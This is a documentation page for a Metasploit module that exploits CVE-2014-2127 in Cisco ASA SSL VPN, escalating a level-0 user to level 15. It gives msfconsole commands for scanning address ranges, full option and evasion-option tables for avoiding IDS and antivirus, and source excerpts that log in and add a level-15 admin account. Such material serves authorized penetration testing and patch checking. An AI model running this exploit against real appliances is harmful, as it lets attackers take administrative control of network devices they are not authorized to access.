Cisco ASA SSL VPN Privilege Escalation Vulnerability - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/cisco_ssl_vpn_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cisco ASA SSL VPN Privilege Escalation Vulnerability
Module: auxiliary/scanner/http/cisco_ssl_vpn_priv_esc
Source code: modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb
Disclosure date: 2014-04-09
Last modification time: 2022-01-23 15:28:32 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2014-2127

This module exploits a privilege escalation vulnerability for Cisco ASA SSL VPN (aka: WebVPN). It allows level 0 users to escalate to level 15.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/cisco_ssl_vpn_priv_esc
msf auxiliary(cisco_ssl_vpn_priv_esc) > show options
    ... show and set options ...
msf auxiliary(cisco_ssl_vpn_priv_esc) > set RHOSTS ip-range
msf auxiliary(cisco_ssl_vpn_priv_esc) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(cisco_ssl_vpn_priv_esc) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(cisco_ssl_vpn_priv_esc) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(cisco_ssl_vpn_priv_esc) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/cisco_ssl_vpn_priv_esc auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/cisco_ssl_vpn_priv_esc

msf6 auxiliary(scanner/http/cisco_ssl_vpn_priv_esc) > show info

       Name: Cisco ASA SSL VPN Privilege Escalation Vulnerability
     Module: auxiliary/scanner/http/cisco_ssl_vpn_priv_esc
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-04-09

Provided by:
  jclaudius <[email protected]>
  lguay <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  GROUP     clientless       yes       A specific VPN group to use
  PASSWORD  clientless       yes       A specific password to authenticate with
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RETRIES   10               yes       The number of exploit attempts to make
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     443              yes       The target port (TCP)
  SSL       true             no        Negotiate SSL/TLS for outgoing connections
  THREADS   1                yes       The number of concurrent threads (max one per host)
  USERNAME  clientless       yes       A specific username to authenticate as
  VHOST                      no        HTTP server virtual host

Description:
  This module exploits a privilege escalation vulnerability for Cisco 
  ASA SSL VPN (aka: WebVPN). It allows level 0 users to escalate to 
  level 15.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2014-2127
  http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-asa
  https://www3.trustwave.com/spiderlabs/advisories/TWSL2014-005.txt

Module Options


This is a complete list of options available in the scanner/http/cisco_ssl_vpn_priv_esc auxiliary module:

msf6 auxiliary(scanner/http/cisco_ssl_vpn_priv_esc) > show options

Module options (auxiliary/scanner/http/cisco_ssl_vpn_priv_esc):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   GROUP     clientless       yes       A specific VPN group to use
   PASSWORD  clientless       yes       A specific password to authenticate with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RETRIES   10               yes       The number of exploit attempts to make
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  clientless       yes       A specific username to authenticate as
   VHOST                      no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/cisco_ssl_vpn_priv_esc auxiliary module:

msf6 auxiliary(scanner/http/cisco_ssl_vpn_priv_esc) > show advanced

Module advanced options (auxiliary/scanner/http/cisco_ssl_vpn_priv_esc):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/cisco_ssl_vpn_priv_esc module can do:

msf6 auxiliary(scanner/http/cisco_ssl_vpn_priv_esc) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/cisco_ssl_vpn_priv_esc auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/cisco_ssl_vpn_priv_esc) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Unable to run '<COMMAND>'


Here is a relevant code snippet related to the "Unable to run '<COMMAND>'" error message:

113:	
114:	      if resp &&
115:	         resp.body.include?('Cisco Adaptive Security Appliance Software Version')
116:	        return resp.body
117:	      else
118:	        vprint_error("Unable to run '#{command}'")
119:	        vprint_good("Retrying #{i} '#{command}'") unless i == 2
120:	      end
121:	    end
122:	
123:	    return nil

Unable to run '<COMMAND>'


Here is a relevant code snippet related to the "Unable to run '<COMMAND>'" error message:

136:	         !resp.body.include?('Command authorization failed') &&
137:	         !resp.body.include?('Command failed')
138:	        vprint_good("Privilege Escalation Appeared Successful")
139:	        return [username, password]
140:	      else
141:	        vprint_error("Unable to run '#{command}'")
142:	        vprint_good("Retrying #{i} '#{command}'") unless i == tries - 1
143:	      end
144:	    end
145:	
146:	    return nil

Does not appear to be Cisco SSL VPN


Here is a relevant code snippet related to the "Does not appear to be Cisco SSL VPN" error message:

191:	  end
192:	
193:	  def run_host(ip)
194:	    # Validate we're dealing with Cisco SSL VPN
195:	    unless validate_cisco_ssl_vpn
196:	      vprint_error("Does not appear to be Cisco SSL VPN")
197:	      return
198:	    end
199:	
200:	    # This is crude, but I've found this to be somewhat
201:	    # interimittent based on session, so we'll just retry

Failed to login to Cisco SSL VPN


Here is a relevant code snippet related to the "Failed to login to Cisco SSL VPN" error message:

210:	                 datastore['GROUP']
211:	               )
212:	
213:	      # See if our authentication attempt failed
214:	      unless cookie
215:	        vprint_error("Failed to login to Cisco SSL VPN")
216:	        next
217:	      end
218:	
219:	      # Grab version
220:	      version = do_show_version(cookie)

Show version failed


Here is a relevant code snippet related to the "Show version failed" error message:

222:	      if version &&
223:	         version_match = version.match(/Cisco Adaptive Security Appliance Software Version ([\d+\.\(\)]+)/)
224:	        print_good("Show version succeeded. Version is Cisco ASA #{version_match[1]}")
225:	      else
226:	        do_logout(cookie)
227:	        vprint_error("Show version failed")
228:	        next
229:	      end
230:	
231:	      # Attempt to add an admin user
232:	      creds = add_user(cookie)

Failed to created user account on Cisco SSL VPN


Here is a relevant code snippet related to the "Failed to created user account on Cisco SSL VPN" error message:

235:	      if creds
236:	        print_good("Successfully added level 15 account #{creds.join(", ")}")
237:	        user, pass = creds
238:	        report_escalated_creds(user, pass)
239:	      else
240:	        vprint_error("Failed to created user account on Cisco SSL VPN")
241:	      end
242:	    end
243:	  end
244:	
245:	  def report_escalated_creds(username, password)

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • jclaudius <jclaudius[at]trustwave.com>
  • lguay <laura.r.guay[at]gmail.com>

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.